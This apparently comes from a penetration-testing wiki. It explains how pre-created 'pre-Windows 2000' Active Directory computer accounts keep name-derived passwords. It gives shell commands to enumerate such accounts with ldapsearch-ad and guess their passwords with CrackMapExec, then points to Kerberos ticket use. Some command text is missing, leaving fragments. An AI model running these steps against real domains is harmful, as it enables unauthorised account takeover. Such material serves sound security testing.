Pre-Windows 2000 computers


When a new computer account is configured as "pre-Windows 2000 computer", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.
Once an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed.


Finding computer accounts that have been "pre-created" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):
The logonCount attribute can be filtered as well.
The ldapsearch-ad tool can be used to find such accounts. Once "pre-created" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with CrackMapExec (Python) for instance.
# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt
# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt
# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt
# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
cme smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce
You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (
Testers can then change the Pre-Windows 2000 computer accounts' password (i.e.,, etc.) in order to use it.
Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source) $DOMAIN/$COMPUTER_NAME\$:$COMPUTER_PASSWORD
The ticket obtained can then be used with Pass the ticket